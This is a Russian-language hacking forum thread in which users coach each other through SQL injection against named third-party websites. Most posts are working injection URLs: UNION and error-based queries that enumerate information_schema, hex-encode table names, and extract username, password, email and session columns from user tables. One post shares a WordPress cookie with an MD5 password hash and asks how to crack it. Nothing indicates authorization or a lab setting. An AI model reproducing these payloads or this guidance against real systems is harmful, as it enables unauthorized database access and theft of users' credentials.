http://ukr-link.com/index.php?idd=search&stext=auto')union(select'1',2,table_name,(4)from(information_schema.tables))%23
Насколько я понял, ты $row['id'] устанавливаешь методом POST, где данные передаются "как есть", т.е. не url-encoded символы не превращаются в обычные. Попробуй обратится GET'ом, или COOKIE. Если запрос в БД идет через глобальный массив _REQUEST, то должно сработать.
$row['id'] берется из базы. пробовал обычную картинку - тот же еррор. видимо файлы новые создать нельзя. а существующие он заменяет(
v1d0qz, спасибо за ссылку, но мне это не помогло =( Вот я делаю запрос: Code: http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.columns+where+table_name=%27private_users%27-- У меня кроме ошибок снизу (а они всегда были) ничего не выводится, хотя должно выводиться. Или я чтото не правильно делаю?
Code: http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0x707269766174655f7573657273 Хексим название таблицы и берем названия КОЛОНОК из таблицы с колонками, а не таблиц, ты их уже получил
wildshaman, спасбо, теперь я понял, но вот еще один последний вопрос. Когда я даю запрос, которые есть выше, то на экран выводит user_username и user_password. Как дальше из этих колонок вывести их значения (на данный момент пасс и логин)?
Серьёзно? Тебе-же давали линк: https://forum.antichat.ru/thread104591.html И ты сказал, что прочёл материал. Я там видимо по японски писал, соре
Прочитал пару раз вашу тему и вот что у меня получилось: Code: http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns+where+column_name=0x70616765730d0a-- Выбрал таблицу pages и там одну из колонок, вотвывожу и ничего нет.
Code: http://www.sixls.com/news.php?id=-3+union+select+1,2,count(column_name)+from+information_schema.columns+where+table_name=0x70616765730d0a+--+ Нету там колонок, и после where не column_name, а table_name
Вот такой вопросик: попалась стандартная уязвимость на asp: http://www.site1.com/detail.asp?sid=1485+or+1=@@version-- нормально выводится версия операционки, дальше пытаюсь вытащить названия столбцов из information_schema вот так: http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables)-- показывает, что есть таблица 'Photos', дальше через not in: http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name not in ('Photos'))-- вылетает ошибка " Line 1: Incorrect syntax near 'Photos' " пробую так: http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name not in ("Photos"))-- вылетает: " Invalid column name 'Photos'. " затестил через <>, заменив название таблицы через хекс так: http://www.site1.com/detail.asp?sid=1485+or+1=(select top 1 table_name from information_schema.tables where table_name<>0x50686f746f73)-- сработало, но больше одного названия вытащить не получается. Вопрос: как можно полистать названия?
вот вывод из той самой таблицы, что там могло не получаться? http://www.sixls.com/news.php?id=-3+union+select+1,page_id,3+from+pages-- Я бы с удовольствием ответил, но боюсь, что то, что ты пишешь понимаешь только ты сам Ну или я туповат, я честно пытался понять, но безуспешно. mr.celt С линком будет проще
Strilo4ka, не обижайся, но без разделительных знаков понять то, что ты пишешь, трудновато. Ты не так меня понял. Запрос на сервер можно послать как угодно, другое дело - сделать это через браузер. В браузере через формы с методом POST данные передаются "как есть", тоесть без какого-либо декодирования.
есть строчка такого рода: Code: wordpress_test_cookie=WP+Cookie+check;%20wordpressuser_4660020b7a87d7619827cd8098d2d654=Spider;%20wordpresspass_4660020b7a87d7619827cd8098d2d654=febc22cb6c4923d9271a857fc9ea2f7d как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то?
http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,group_concat%28column_name%29,3%20from%20information_schema.columns%20where%20table_name=0x75736572-- выдает id,name,email,pass,session_id,session_date,nick Нашел Sql Но при этом когда пишу http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,2,3%20from%20user-- Выдет пустую страницу В чем может быть косяк?
